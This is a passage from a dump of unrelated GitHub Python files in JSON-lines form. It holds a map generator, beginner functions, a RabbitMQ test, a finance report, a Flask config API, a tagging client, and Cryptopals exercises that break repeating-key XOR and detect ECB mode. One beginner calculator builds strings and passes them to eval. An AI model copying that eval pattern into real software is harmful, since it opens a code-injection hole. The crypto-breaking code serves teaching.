(166, 72, 233), # Dirt\n 2: (139, 43, 199), # Loose Rock\n 3: (108, 10, 163), # Hard Rock\n 4: (59, 0, 108), # Solid Rock\n 6: (6, 45, 182), # Water\n 7: (239, 79, 16), # Lava\n 8: (56, 44, 73), # Landslide rubble\n 9: (150, 150, 0), # Slimy Slug hole\n 10: (185, 255, 25), # Energy Crystal Seam\n 11: (146, 62, 20), # Ore Seam\n 12: (250, 255, 14), # Recharge Seam\n 13: (190, 190, 190), # Building power path\n }\n\n # Draw the background\n draw.rectangle([offset,\n offset,\n square_size - offset,\n square_size - offset],\n fill=(0, 0, 0))\n\n # Draw the tiles\n for i in range(len(wallArray)):\n for j in range(len(wallArray[0])):\n # Draw the tile\n draw.rectangle([j * scale + offset + 1,\n i * scale + offset + 1,\n j * scale + offset + (scale - 1),\n i * scale + offset + (scale - 1)],\n fill=colors[wallArray[i][j]])\n\n # Draw the crystal and ore indicators\n if crystalArray[i][j] > 0:\n draw.rectangle([\n j * scale + offset + 2,\n i * scale + offset + 4,\n j * scale + offset + 4,\n i * scale + offset + 2],\n fill=colors[10])\n if oreArray[i][j] > 0:\n draw.rectangle([\n j * scale + offset + 5,\n i * scale + offset + 4,\n j * scale + offset + 7,\n i * scale + offset + 2],\n fill=colors[11])\n\n # Center the image\n border_x = (width - square_size) // 2\n border_y = (height - square_size) // 2\n img = ImageOps.expand(img, border=(\n border_x, border_y, border_x, border_y), fill=(0, 0, 0, 0))\n\n # Display the image\n image = ImageQt(img)\n pixmap = QtGui.QPixmap.fromImage(image).copy()\n self.map_preview.setPixmap(pixmap)\n\n def update_map_size(self, value):\n value *= 8\n self.map_generator.parameters['size'] = value\n self.generate_map()\n\n def update_biome(self, value):\n self.map_generator.parameters['biome'] = value\n\n def update_solid_rock(self, value):\n value = value * 0.004 + 0.2\n self.map_generator.parameters['solidDensity'] = value\n self.generate_map()\n\n def update_other_rock(self, value):\n value = value * 0.004 + 0.2\n self.map_generator.parameters['wallDensity'] = value\n self.generate_map()\n\n def update_energy_crystals(self, value):\n value = value * 0.008\n self.map_generator.parameters['crystalDensity'] = value\n self.generate_map()\n\n def update_ore(self, value):\n value = value * 0.008\n self.map_generator.parameters['oreDensity'] = value\n self.generate_map()\n\n def update_ecs(self, value):\n value = value * 0.006\n self.map_generator.parameters['crystalSeamDensity'] = value\n self.generate_map()\n\n def update_os(self, value):\n value = value * 0.006\n self.map_generator.parameters['oreSeamDensity'] = value\n self.generate_map()\n\n def update_rs(self, value):\n value = value * 0.003\n self.map_generator.parameters['rechargeSeamDensity'] = value\n self.generate_map()\n\n def update_flood_level(self, value):\n value = value / 100\n self.map_generator.parameters['floodLevel'] = value\n self.generate_map()\n\n def update_flood_type(self, value):\n self.map_generator.parameters['floodType'] = value\n self.generate_map()\n\n def update_erosion_sources(self, value):\n value = value / 1000\n self.map_generator.parameters['flowDensity'] = value\n self.generate_map()\n\n def update_landslide_sources(self, value):\n value = value * 0.004\n self.map_generator.parameters['landslideDensity'] = value\n self.generate_map()\n\n def update_slugs(self, value):\n value = value * 0.001\n self.map_generator.parameters['slugDensity'] = value\n self.generate_map()\n\n\n# Do the thing\nif __name__ == '__main__':\n app = QApplication([])\n window = MainWindow()\n window.show()\n app.exec()\n","repo_name":"vyldr/map-generator","sub_path":"map-generator.py","file_name":"map-generator.py","file_ext":"py","file_size_in_byte":14253,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"5397391831","text":"from cmath import sqrt\r\nfrom re import A\r\n\r\n\r\ndef arithmetic(a1:float,sym:str,a2:float)->any:\r\n \"\"\"Lihtne kalkulaator\r\n + - liitmine, - - lahutamine, * - korrutamine, / - jagamine\r\n :param float a1: Esimene arv\r\n :param float a2: Teine arv\r\n :param str sym: Tehe\r\n :rtype: var Määramata tüüp\r\n \"\"\"\r\n if sym in [\"+\",\"-\",\"/\",\"*\"]:\r\n if sym==\"/\" and a2==0:\r\n vas=\"Div/0\"\r\n else:\r\n vas = eval(str(a1)+sym+str(a2))\r\n else:\r\n vas = \"Tundmatu tehe!\"\r\n return vas\r\n\r\ndef is_year_leap(aasta:int)->bool:\r\n \"\"\"\r\n Liigaasta leidmine\r\n Tagastab True kui aasta on liigaasta ja False kui ei ole\r\n :param int aasta: Aasta number\r\n :rtype: bool Funktsioni vastus loogilises formaadis\r\n \"\"\"\r\n aasta = int(aasta)\r\n if aasta%4==0:\r\n t=True\r\n else:\r\n t=False\r\n return t\r\n\r\ndef square(a:float)->float:\r\n \"\"\"Läbimõõdu, pindala ja diagonaali leidmine\r\n :param float number: Teie number\r\n :rtype:\r\n \"\"\"\r\n try:\r\n a=float(a)\r\n if a>0:\r\n P = 4*a\r\n S = a**2\r\n d = a*sqrt(2)\r\n return P,S,d\r\n else:\r\n v=\"----\"\r\n return v\r\n except:\r\n v=\"---\"\r\n return v\r\n \r\n\r\ndef season(num):\r\n\r\n if num == 12 or 1 <= num <= 2:\r\n\r\n print(\"Talv\")\r\n\r\n elif 3 <= num <= 5:\r\n\r\n print(\"Kevad\")\r\n\r\n elif 6 <= num <= 8:\r\n\r\n print(\"Suvi\")\r\n\r\n elif 9 <= num <= 11:\r\n\r\n print(\"Sügis\")\r\n\r\n else:\r\n\r\n print(\"Valed andmed\") \r\n\r\ndef bank(n, y):\r\n \"\"\"Panga intressi kalkulaator\r\n\r\n\r\n \"\"\"\r\n raha = n\r\n years = y\r\n def money():\r\n if years >0:\r\n raha = n*1.1\r\n years = years -1\r\n return money()\r\n else:\r\n return raha\r\n\r\n print(raha)\r\n","repo_name":"RainonC/programmeerimise-alused","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7122811531","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: blackbox_publish.py\n\n Description: Blackbox testing of rmq_2_isse.py program.\n\n Usage:\n test/blackbox/rmq_2_isse/blackbox_publish.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport os\nimport sys\nimport time\n\n# Third-party\n\n# Local\nsys.path.append(os.getcwd())\nimport rabbit_lib.rabbitmq_class as rabbitmq_class\nimport lib.gen_libs as gen_libs\nimport version\n\n__version__ = version.__version__\n\n\ndef create_rq_pub(cfg, **kwargs):\n\n \"\"\"Function: create_rq_pub\n\n Description: Create a RabbitMQ Publisher instance.\n\n Arguments:\n (input) cfg -> Configuration settings module for the program.\n (output) rq -> RabbitMQ Publisher instance\n\n \"\"\"\n\n rq = rabbitmq_class.RabbitMQPub(cfg.user, cfg.passwd, cfg.host, cfg.port,\n cfg.exchange_name, cfg.exchange_type,\n cfg.queue_name, cfg.queue_name,\n cfg.x_durable, cfg.q_durable,\n cfg.auto_delete)\n\n connect_status, err_msg = rq.create_connection()\n\n if connect_status and rq.channel.is_open:\n return rq\n\n else:\n print(\"Error: Failed to connect to RabbitMQ as Publisher.\")\n return None\n\n\ndef publish_message(rq, f_name, **kwargs):\n\n \"\"\"Function: publish_message\n\n Description: Publish a message to RabbitMQ queue.\n\n Arguments:\n (input) rq -> RabbitMQ Publisher instance\n (input) f_name -> File name of test file.\n (output) status -> True|False - Success of the test.\n (output) err_msg -> Error message or None.\n\n \"\"\"\n\n status = True\n err_msg = None\n\n if not rq.publish_msg(f_name):\n err_msg = \"\\tError: Failed to publish message to RabbitMQ.\"\n status = False\n\n time.sleep(1)\n\n return status, err_msg\n\n\ndef publish(rq, **kwargs):\n\n \"\"\"Function: publish\n\n Description: Publish test message to RabbitMQ queue.\n\n Arguments:\n (input) rq -> RabbitMQ Publisher instance\n\n \"\"\"\n\n f_name = \"file13\"\n\n status, err_msg = publish_message(rq, f_name)\n\n if not status:\n print(err_msg)\n print(\"\\tPublish failed\\n\")\n\n\ndef main():\n\n \"\"\"Function: main\n\n Description: Control the blackbox testing of rmq_2_isse.py program.\n\n Variables:\n status -> True|False - If connection to RabbitMQ was created.\n base_dir -> Directory path to blackbox testing directory.\n test_path -> Current full directory path, including base_dir.\n config_path -> Directory path to config, including test_path.\n\n Arguments:\n\n \"\"\"\n\n base_dir = \"test/blackbox/rmq_2_isse\"\n test_path = os.path.join(os.getcwd(), base_dir)\n config_path = os.path.join(test_path, \"config\")\n\n cfg = gen_libs.load_module(\"rabbitmq\", config_path)\n\n rq = create_rq_pub(cfg)\n\n if not rq:\n print(\"Error: Failed to create RabbitMQ Publisher instance\")\n\n else:\n publish(rq)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"mjpernot/rabbitmq-isse","sub_path":"test/blackbox/rmq_2_isse/blackbox_publish.py","file_name":"blackbox_publish.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22284722091","text":"from timeit import default_timer as timer\n\n\ndef get_financial_otc_trade(parties_df, position, risk, cash_flows, headers, ip):\n parties = parties_df.set_index('legalName')\n report = position[\n ['tradeId', 'bookName', 'counterPartyName', 'tradeDate', 'asset.expirationDate', 'asset.direction',\n 'asset.underlyerInstrumentId', 'asset.notionalAmount', 'actualPremium', 'positionId', 'tradeStatus']]\n report.columns = ['optionName', 'bookName', 'client', 'dealStartDate', 'expiry', 'side', 'baseContract',\n 'nominalPrice', 'beginPremium', 'positionId', 'status']\n start = timer()\n report = report.merge(risk[['price']].reset_index(), on='positionId', how='left')\n report['baseContract'].fillna('', inplace=True)\n report.fillna(0, inplace=True)\n report['beginPremium'] = abs(report['beginPremium'])\n report.rename(columns={'price': 'endPremium'}, inplace=True)\n end = timer()\n print('\\tmerge risk and position takes ' + str(end - start) + ' seconds')\n start = timer()\n report['assetType'] = report.apply(\n lambda row: 'STOCK' if row.get('baseContract', '').endswith('.SZ') or row.get('baseContract', '').endswith(\n '.SH') or row.get('baseContract', '').endswith('.CFE') else 'COMMODITY', axis=1)\n cash_flows.set_index('positionId', inplace=True)\n end = timer()\n print('\\t compute assetType takes ' + str(end - start) + ' seconds')\n start = timer()\n report['endDate'] = report.apply(\n lambda row: cash_flows.loc[row['positionId'], 'timestamp'] if row['positionId'] in cash_flows.index and\n row['status'] != 'LIVE' else '', axis=1)\n end = timer()\n print('\\t compute endDate takes ' + str(end - start) + ' seconds')\n start = timer()\n report['masterAgreementId'] = report.apply(lambda row: parties.loc[row['client']]['masterAgreementId'], axis=1)\n end = timer()\n print('\\t compute masterAgreementId takes ' + str(end - start) + ' seconds')\n start = timer()\n report['totalPremium'] = report.apply(\n lambda row: row['beginPremium'] + row['endPremium'] if row['side'] == 'SELLER' else row['endPremium'] - row[\n 'beginPremium'], axis=1).fillna(0)\n end = timer()\n print('\\t compute totalPremium takes ' + str(end - start) + ' seconds')\n return report.fillna(0)\n","repo_name":"zhanrendong/jkzx1","sub_path":"scripts/airflow/report/eod/eod_finance_trade_report_pd.py","file_name":"eod_finance_trade_report_pd.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12340854701","text":"#########################\n# Title: Problem Set 4 #\n# Nicole Zatorski #\n#########################\n\n# We will calculate the flux due to a charged sphere in space through a plane.\n\nfrom math import sqrt, pi, sin, atan2\nE0 = 8.854187817e-12 \nk = 1.0 / (4 * pi * E0)\n\npos_sphere = [0, 0, 0]\nq_sphere = 10e-6\n\n\n# the dE_list is the jhat-component of the electric field because the other\n# components don't contribute to flux\n\n\ndef F():\n plane = ((2.0, 2.0, 1.0), (-2.0, -2.0, 1.0), (2.0, -2.0, 1.0), (-2.0, 2.0, 1.0)) # Position of the verticies of the square\n Lx = (plane[1][0] - plane[0][0])**2 # Length of the sides of the square\n Ly = (plane[1][1] - plane[0][1])**2\n area = (plane[0][0] - plane[1][0]) * (plane[0][1] - plane[1][1]) # Area of the square\n distance = sqrt(Lx + Ly)\n dx = 1.0e-3 # Integral increment length\n dy = 1.0e-3 \n dEx_list = [] # Differential contributions\n dEy_list = [] \n## for i in xrange(int(sqrt(Lx) / dx)): # Create our integration iterable\n## theta = atan2(1, i)\n## E_sphere = ((k * q_sphere) / (distance ** 2)) * sin (theta)\n## dEx_list.append(E_sphere)\n## for elt in dEx_list:\n for i in xrange(int(sqrt(Lx) / dx)): # Taking all of the partitions of x\n for j in xrange(int(sqrt(Ly) / dy)): # and calculating the electric field for \n theta = atan2(1, i*distance) # the corresponding line of y values\n E_sphere = ((k * q_sphere) / (distance ** 2)) * sin (theta) # The j hat component of the electric field\n dEy_list.append(E_sphere)\n E = sum(dEy_list)\n F = E * area\n return F # Total Flux\n\ndef vector(F):\n plane = ((2.0, 2.0, 1.0), (-2.0, -2.0, 1.0), (2.0, -2.0, 1.0), (-2.0, 2.0, 1.0))\n area = (plane[0][0] - plane[1][0]) * (plane[0][1] - plane[1][1])\n Eforce = F *(10.0e-3) # E (which is flux divided by area) multiplied\n g = 9.80665 # by charge (which is sigma times area is force\n mass = Eforce/g # Sum of forces is 0, so electric field force equals \n return mass # gravitational force\n","repo_name":"Zatorski/NicoleZatorski_python_seminar","sub_path":"Problem_Set_4.py","file_name":"Problem_Set_4.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15282041458","text":"from django_filters.rest_framework import (\n filters,\n FilterSet,\n)\n\nfrom post.models import Post\n\n\nclass PostFilter(FilterSet):\n\n class Meta:\n model = Post\n fields = ('is_draft', 'is_deleted', 'category')\n\n # tags = filters.ModelMultipleChoiceFilter(\n # queryset=Tag.objects.all(),\n # method='filter_tags'\n # )\n\n category = filters.CharFilter(\n field_name='category__title__in', method='filter_by_category',\n )\n\n @staticmethod\n def filter_by_category(queryset, field_name: str, value: str):\n \"\"\" Фильтрация по тегу\n \"\"\"\n if value:\n queryset = queryset.filter(**{field_name: value.split(',')})\n return queryset.distinct()\n","repo_name":"AlertRED/blog-django-vue","sub_path":"backend/post/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8001890089","text":"from PIL import Image\nfrom pylab import *\nfrom scipy.ndimage import filters\n#from SciPy import misc\nfrom PCV.tools import imtools\n\nim = array(Image.open('../data/empire.jpg').convert('L'))\n#im = misc.lena()\nim2, cdf = imtools.histeq(im)\nim3 = np.uint8(255 * (im / (filters.gaussian_filter(im, 400) + 0.00001)))\n\nfigure()\nsubplot(231)\naxis('off')\ngray()\ntitle('original')\nimshow(im)\n\nsubplot(234)\naxis('off')\ntitle('original hist')\n#hist(im.flatten(), 128, cumulative=True, normed=True)\nhist(im.flatten(), 128, normed=True)\n\nsubplot(232)\naxis('off')\ngray()\ntitle('histogram-equalized')\nimshow(im2)\n\nsubplot(235)\naxis('off')\ntitle('equalized hist')\n#hist(im2.flatten(), 128, cumulative=True, normed=True)\nhist(im2.flatten(), 128, normed=True)\n\nsubplot(233)\naxis('off')\ngray()\ntitle('quotient image')\nimshow(im3)\n\nsubplot(236)\naxis('off')\ntitle('quotient hist')\nhist(im3.flatten(), 128, normed=True)\n\nshow()\n","repo_name":"willard-yuan/pcv-book-code","sub_path":"ch01/ch01_ex03_quotim.py","file_name":"ch01_ex03_quotim.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":492,"dataset":"github-code","pt":"37"} +{"seq_id":"70860411628","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom flask import Blueprint, request, jsonify, send_file\r\nfrom app.decorators import *\r\nfrom app.classes.config import Config\r\nimport sys\r\n\r\nconfig_bp = Blueprint(\"config\", __name__)\r\nconfig = Config()\r\n\r\n\r\n@config_bp.route('/switch//', methods=['GET'])\r\n@require_header_token\r\ndef switch(cat, key):\r\n \"\"\"\r\n Switch the Boolean value of a configuration key.\r\n :return: status in JSON\r\n \"\"\"\r\n try:\r\n value = config.read_config((cat, key))\r\n if value:\r\n config.write_config(cat, key, False)\r\n res = {\"status\": True,\r\n \"message\": \"Key switched to false\"}\r\n else:\r\n config.write_config(cat, key, True)\r\n res = {\"status\": True,\r\n \"message\": \"Key switched to true\"}\r\n except:\r\n res = {\"status\": True,\r\n \"message\": \"Issue while changing value\"}\r\n\r\n return jsonify(res)\r\n\r\n\r\n@config_bp.route('/edit///', methods=['GET'])\r\n@require_header_token\r\ndef edit(cat, key, value):\r\n \"\"\"\r\n Edit the string (or array) value of a configuration key.\r\n :return: status in JSON\r\n \"\"\"\r\n return jsonify(config.write_config(cat, key, value))\r\n\r\n\r\n@config_bp.route('/db/export', methods=['GET'])\r\n@require_get_token\r\ndef export_db():\r\n \"\"\"\r\n Export the database.\r\n :return: current database as attachment\r\n \"\"\"\r\n return config.export_db()\r\n\r\n\r\n@config_bp.route('/db/import', methods=['POST'])\r\n@require_header_token\r\ndef import_db():\r\n \"\"\"\r\n Import a database and replace the existant.\r\n :return: status in JSON\r\n \"\"\"\r\n try:\r\n f = request.files[\"file\"]\r\n assert f.read(15) == b\"SQLite format 3\"\r\n d = \"/\".join(sys.path[0].split(\"/\")[:-2])\r\n f.save(\"/{}/tinycheck.sqlite3\".format(d))\r\n res = {\"status\": True,\r\n \"message\": \"Database updated\"}\r\n except:\r\n res = {\"status\": False,\r\n \"message\": \"Error while database upload\"}\r\n return jsonify(res)\r\n\r\n\r\n@config_bp.route('/list', methods=['GET'])\r\ndef list():\r\n \"\"\"\r\n List key, values of the configuration\r\n :return: configuration in JSON\r\n \"\"\"\r\n res = config.export_config()\r\n res[\"backend\"][\"password\"] = \"\"\r\n return jsonify(res)\r\n","repo_name":"KasperskyLab/TinyCheck","sub_path":"server/backend/app/blueprints/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":2951,"dataset":"github-code","pt":"37"} +{"seq_id":"71175972909","text":"# -*- coding: utf-8 -*-\nimport jieba.posseg\nimport ConfigParser\nimport base64\nimport redis\nimport json\nimport time\nimport sys\nimport os\nfrom thrift.transport import TTransport, TSocket\nfrom thrift.protocol import TCompactProtocol\nsys.path.append('tags/src')\nsys.path.append('tool')\nfrom rpcservice import TagRPCService\nfrom mail_sender import send_mail\n\n\nPATH_CURRENT = os.path.realpath('.')\nPATH_TRUNK = PATH_CURRENT[:PATH_CURRENT.rfind('/cn')]\nCONFIG_NEWS = '%s/cn/config/news.conf' % PATH_TRUNK\nparser_config = ConfigParser.ConfigParser()\nparser_config.read(CONFIG_NEWS)\nREDIS_SERVER = parser_config.get('Settings', 'REDIS_SERVER')\nREDIS_PORT = int(parser_config.get('Settings', 'REDIS_PORT'))\nREDIS_DB = int(parser_config.get('Settings', 'REDIS_DB'))\nREDIS_DB_NEWS = int(parser_config.get('Settings', 'REDIS_DB_NEWS'))\nREDIS_CLIENT = redis.Redis(REDIS_SERVER, REDIS_PORT, REDIS_DB)\nREDIS_CLIENT_NEWS = redis.Redis(REDIS_SERVER, REDIS_PORT, REDIS_DB_NEWS)\nTAGS_MODEL_VERSION = parser_config.get('Settings', 'TAGS_MODEL_VERSION')\n\n\nclass TagsClient:\n\n def __init__(self, server, port, retry_times, retry_interval):\n transport = TSocket.TSocket(server, port)\n self.tags_transport = TTransport.TBufferedTransport(transport)\n protocol = TCompactProtocol.TCompactProtocol(self.tags_transport)\n self.tags_client = TagRPCService.Client(protocol)\n self.tags_retry_times = retry_times\n self.tags_retry_interval = retry_interval\n\n def get_tags_from_news(self, news_info):\n tags, model_version = self.get_tags_from_redis(news_info['account'])\n if tags is not None:\n return tags, model_version\n contents = ''.join([content['text'] for content in news_info['content'] if 'text' in content])\n info = {\n 'account': news_info['account'],\n 'content_tokens': self.split_words(contents),\n 'title_tokens': self.split_words(news_info['title']),\n 'source': news_info['subtitle'],\n 'subtitle': news_info['subtitle'],\n }\n info_json = json.dumps(info, ensure_ascii=False, sort_keys=True).encode('utf8')\n for times in range(self.tags_retry_times):\n try:\n tags_result = json.loads(self.get_tags_from_server(info_json))\n except TTransport.TTransportException:\n time.sleep(self.tags_retry_interval)\n continue\n if tags_result['status'] == 200:\n tags = []\n for tags_info in tags_result['tags']:\n tags.append(tags_info[0])\n return tags, tags_result['model_version']\n else:\n subject = '{Matrix}{feeds}{tags client error}'\n message = 'Invalid Return Code %s' % tags_result['status']\n send_mail(subject, message)\n return None, ''\n subject = '{Matrix}{feeds}{lost tags server}'\n message = 'Server Lost\\nSpider Name: %s\\nRetry Times: %s\\nRetry Interval: %s\\n' % \\\n ('breaking_news', self.tags_retry_times, self.tags_retry_interval)\n send_mail(subject, message)\n return None, ''\n\n @staticmethod\n def get_tags_from_redis(account):\n model_version = REDIS_CLIENT.get(TAGS_MODEL_VERSION)\n raw = REDIS_CLIENT_NEWS.get(account)\n if not raw:\n return None, ''\n news_info = json.loads(base64.b64decode(raw))\n if not news_info.get('model_version', '') == model_version:\n return None, model_version\n return news_info.get('tags'), news_info.get('model_version', '')\n\n def get_tags_from_server(self, info_json):\n self.tags_transport.open()\n tags_result = self.tags_client.gen_tags(info_json)\n self.tags_transport.close()\n return tags_result\n\n @staticmethod\n def split_words(text):\n return [unicode(word) for word in jieba.posseg.cut(text)]\n","repo_name":"dxyist/funssy_spider","sub_path":"util/tags_util.py","file_name":"tags_util.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71353549226","text":"import random\nimport string\nimport time\nimport binascii\nimport collections\nimport cryptopals\n\n\ndef time_it(method):\n \"\"\"\n Timing wrapper to log how long a method took to run.\n Example:\n @time_it\n def some_func():\n ...\n\n :param method: Expects to wrap a function\n :return:\n \"\"\"\n\n def wrapper(*args, **kw):\n startTime = int(round(time.time() * 1000))\n result = method(*args, **kw)\n endTime = int(round(time.time() * 1000))\n print(\"Function Name: {0} - {1}ms\".format(method.__name__, endTime - startTime))\n\n return result\n\n return wrapper\n\n\n@time_it\ndef challenge_01() -> None:\n input_string = \"49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d\"\n _hex = bytes.fromhex(\n input_string\n ) # b\"I'm killing your brain like a poisonous mushroom\"\n _b64 = binascii.b2a_base64(_hex).decode()\n\n assert (\n _b64.strip()\n == \"SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t\"\n )\n\n\n@time_it\ndef challenge_02() -> None:\n key = bytes.fromhex(\"686974207468652062756c6c277320657965\")\n message = bytes.fromhex(\"1c0111001f010100061a024b53535009181c\")\n\n decrypted = cryptopals.decrypt_xor(message, key) # b\"the kid don't play\"\n\n assert decrypted == bytes.fromhex(\"746865206b696420646f6e277420706c6179\")\n\n\n@time_it\ndef challenge_03() -> None:\n \"\"\"\n Single-byte XOR cipher\n The hex encoded string:\n\n 1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\n ... has been XOR'd against a single character. Find the key, decrypt the message.\n\n You can do this by hand. But don't: write code to do it for you.\n\n How?\n \"\"\"\n data = bytes.fromhex(\n \"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"\n )\n key, decrypted_message = cryptopals.find_key_and_decrypt_fixed_xor(data)\n assert decrypted_message == b\"Cooking MC's like a pound of bacon\"\n\n\n@time_it\ndef challenge_04() -> None:\n \"\"\"\n Detect single-character XOR\n One of the 60-character strings in this file has been encrypted by single-character XOR.\n\n Find it.\n\n (Your code from #3 should help.)\n \"\"\"\n\n with open(\"data/4.txt\", \"r\") as handle:\n for line in handle.readlines():\n line = binascii.a2b_hex(line.strip())\n\n key, decrypted = cryptopals.find_key_and_decrypt_fixed_xor(line)\n\n if cryptopals.english.part_of_language(decrypted):\n assert decrypted == b\"Now that the party is jumping\\n\"\n\n\n@time_it\ndef challenge_05() -> None:\n \"\"\"\n Implement repeating-key XOR\n Here is the opening stanza of an important work of the English language:\n\n Burning 'em, if you ain't quick and nimble\n I go crazy when I hear a cymbal\n Encrypt it, under the key \"ICE\", using repeating-key XOR.\n\n In repeating-key XOR, you'll sequentially apply each byte of the key;\n the first byte of plaintext will be XOR'd against I, the next C, the next E, then I again for the 4th byte, etc.\n\n It should come out to:\n\n 0b3637272a2b2e63622c2e69692a23693a2a3c6324202d623d63343c2a26226324272765272\n a282b2f20430a652e2c652a3124333a653e2b2027630c692b20283165286326302e27282f\n \"\"\"\n\n test = (\n b\"0b3637272a2b2e63622c2e69692a23693a2a3c6324202d623d63343c2a26226324272765272\"\n b\"a282b2f20430a652e2c652a3124333a653e2b2027630c692b20283165286326302e27282f\"\n )\n line = (\n b\"Burning 'em, if you ain't quick and nimble\\nI go crazy when I hear a cymbal\"\n )\n\n encrypt = cryptopals.encrypt_xor(line, b\"ICE\")\n assert encrypt == test\n\n\n@time_it\ndef challenge_06() -> None:\n \"\"\"\n Break repeating-key XOR\n :return:\n \"\"\"\n with open(\"data/6.txt\", \"r\") as handle:\n message = handle.read()\n\n # convert from base64 to bytes\n message = binascii.a2b_base64(message)\n\n result = cryptopals.break_repeating_key_xor(message)\n\n assert result == b\"Terminator X: Bring the noise\", result\n\n\n@time_it\ndef challenge_07() -> None:\n \"\"\"\n AES in ECB mode\n The Base64-encoded content in this file has been encrypted via AES-128 in ECB mode under the key\n\n \"YELLOW SUBMARINE\".\n (case-sensitive, without the quotes; exactly 16 characters; I like \"YELLOW SUBMARINE\" because it's exactly 16 bytes\n long, and now you do too).\n\n Decrypt it. You know the key, after all.\n\n Easiest way: use OpenSSL::Cipher and give it AES-128-ECB as the cipher.\n \"\"\"\n\n key = b\"YELLOW SUBMARINE\"\n\n with open(\"data/7.txt\", \"r\") as handle:\n text = binascii.a2b_base64(handle.read())\n\n result = cryptopals.decrypt_aes(text, key)\n\n lines = result.decode(\"utf-8\").split(\"\\n\")\n assert (\n lines[0] == \"I'm back and I'm ringin' the bell \"\n ), \"Decrypt AES Failed: {}\".format(lines[0])\n\n\n@time_it\ndef challenge_08() -> None:\n \"\"\"\n 8.txt contains a bunch of hex-encoded ciphertexts.\n - One of them has been encrypted with ECB.\n - Detect it.\n - The problem with ECB is that it is stateless and deterministic;\n - the same 16 byte plaintext block will always produce the same 16 byte ciphertext.\n \"\"\"\n\n ecb_encrypted_line = 132\n\n with open(\"data/8.txt\", \"r\") as handle:\n lines = handle.readlines()\n\n for index, line in enumerate(lines):\n text = bytes.fromhex(line.strip(\"\\n\"))\n\n if cryptopals.detect_ecb_use(text, 16):\n break\n\n assert ecb_encrypted_line == index\n\n\n@time_it\ndef challenge_09() -> None:\n text = b\"YELLOW SUBMARINE\"\n assert b\"YELLOW SUBMARINE\\x04\\x04\\x04\\x04\" == cryptopals.pkcs_7_padding(text, 20)\n\n\n@time_it\ndef challenge_10() -> None:\n \"\"\"\n CBC mode is a block cipher mode that allows us to encrypt irregularly-sized messages, despite the fact that a block\n cipher natively only transforms individual blocks. In CBC mode, each ciphertext block is added to the next\n plaintext block before the next call to the cipher core.\n\n The first plaintext block, which has no associated previous ciphertext block, is added to a\n \"fake 0th ciphertext block\" called the initialization vector, or IV.\n\n Implement CBC mode by hand by taking the ECB function you wrote earlier, making it encrypt instead of decrypt\n (verify this by decrypting whatever you encrypt to test), and using your XOR function from the previous exercise\n to combine them.\n\n The file is intelligible (somewhat) when CBC decrypted against \"YELLOW SUBMARINE\" with an IV of all ASCII 0\n (\\x00\\x00\\x00 &c)\n \"\"\"\n key = b\"YELLOW SUBMARINE\"\n iv = bytes([0] * 16)\n test_text = b\"this is my fancy text statement.\"\n encrypted = cryptopals.encrypt_aes(test_text, key)\n decrypted = cryptopals.decrypt_aes(encrypted, key)\n\n assert test_text == decrypted\n\n text = binascii.a2b_base64(open(\"data/10.txt\", \"r\").read())\n\n results = cryptopals.decrypt_aes_with_custom_cbc(text, key, iv)\n results = cryptopals.pkcs_7_padding_verification(b\"\".join(results))\n # print(b''.join(results))\n # print(results_stripped)\n\n blocks = cryptopals.encrypt_aes_with_custom_cbc(results, key, iv)\n\n assert text == b\"\".join(blocks), \"{}\".format(blocks)\n\n\n@time_it\ndef challenge_11() -> object:\n \"\"\"\n An ECB/CBC detection oracle\n Now that you have ECB and CBC working:\n\n Write a function to generate a random AES key; that's just 16 random bytes.\n\n Write a function that encrypts data under an unknown key --- that is, a function that generates a random key and\n encrypts under it.\n\n The function should look like:\n\n encryption_oracle(your-input)\n => [MEANINGLESS JIBBER JABBER]\n Under the hood, have the function append 5-10 bytes (count chosen randomly) before the plaintext and 5-10 bytes\n after the plaintext.\n\n Now, have the function choose to encrypt under ECB 1/2 the time, and under CBC the other half (just use random IVs\n each time for CBC). Use rand(2) to decide which to use.\n\n Detect the block cipher mode the function is using each time. You should end up with a piece of code that, pointed\n at a block box that might be encrypting ECB or CBC, tells you which one is happening.\n\n\n :return:\n \"\"\"\n\n def encrypt_oracle(text: bytes):\n random_aes_key = cryptopals.generate_random_bytes(16)\n prefix = cryptopals.generate_random_bytes(random.randint(5, 10))\n postfix = cryptopals.generate_random_bytes(random.randint(5, 10))\n\n message = b\"\".join([prefix, text, postfix])\n\n if random.randint(1, 2) == 2:\n encoding_type = \"ECB\"\n # encrypt ECB\n keysize = len(random_aes_key)\n text = cryptopals.pkcs_7_padding(text, keysize)\n blocks = [text[n : n + keysize] for n in range(0, len(text), keysize)]\n encrypted = []\n for block in blocks:\n text = cryptopals.encrypt_aes(block, random_aes_key)\n # print(binascii.hexlify(text))\n encrypted.append(text)\n else:\n # encrypt_CBC\n encoding_type = \"CBC\"\n random_iv = 